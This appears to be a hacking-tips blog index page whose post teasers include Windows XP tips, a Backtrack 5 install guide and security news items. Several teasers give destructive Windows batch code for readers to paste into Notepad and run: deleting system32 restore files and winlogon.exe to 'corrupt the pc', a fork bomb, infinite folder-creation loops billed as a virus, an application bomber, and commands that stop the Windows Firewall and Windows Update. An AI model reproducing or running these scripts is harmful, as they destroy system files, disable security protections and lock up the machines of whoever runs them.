Top 25 Application Secrets in Windows XP Top 25 Application Secrets in Windows XP

There are some hidden secrets inside the application window XP and sometimes we do not know ... the following list is a list of confident...

Read more »

How to Install Backtrack 5 How to Install Backtrack 5

Download the Backtrack 5 ISO Head over to:  http://www.backtrack-linux.org/downloads/ Then click the download button. After th...

Read more »

LinkedIn users have filed a lawsuit for 'hacking' users' email accounts LinkedIn users have filed a lawsuit for 'hacking' users' email accounts

Four LinkedIn users have filed a lawsuit accusing the business-oriented social network of accessing their email accounts without permission...

Read more »

Apple iPhone 5S fingerprint sensor hacked by Germany's Chaos Computer Club Apple iPhone 5S fingerprint sensor hacked by Germany's Chaos Computer Club

An Apple employee instructs the use of the fingerprint scanner technology built into the company's iPhone 5S. German hackers say they c...

Read more »

Dangerous batch File Coding for corrupt the pc Dangerous batch File Coding for corrupt the pc

1.copy this and paste this in your notepad.. @echo off del c:windowssystem32restore del c:windowssystem32winlogon.exe del c:windowssystem...

Read more »

 create 3000 folder in a single minute using bat file create 3000 folder in a single minute using bat file

@echo off :loop md %random% goto loop saveas myhackzs.bat

Read more »

Service Disabler using bat file Service Disabler using bat file

open notepad & type @echo off net stop “Windows Firewall” net stop “Windows Update” net stop Workstation net stop “DHCP Client” net sto...

Read more »

Fork Bombing using bat file Fork Bombing using bat file

open notepad & type @echo off :loop Explorer Call fork.bat Goto loop save as myhackzs.bat

Read more »

Application Bomber using notepad Application Bomber using notepad

open notepad & type @echo off :loop start notepad start compmgmt.msc start mspaint start osk start cmd start explorer start control sta...

Read more »

Folder Replicator Virus using bat file Folder Replicator Virus using bat file

open notepad & type :loop md Virus cd Virus goto loop save as hackzs.bat

Read more »
 
Top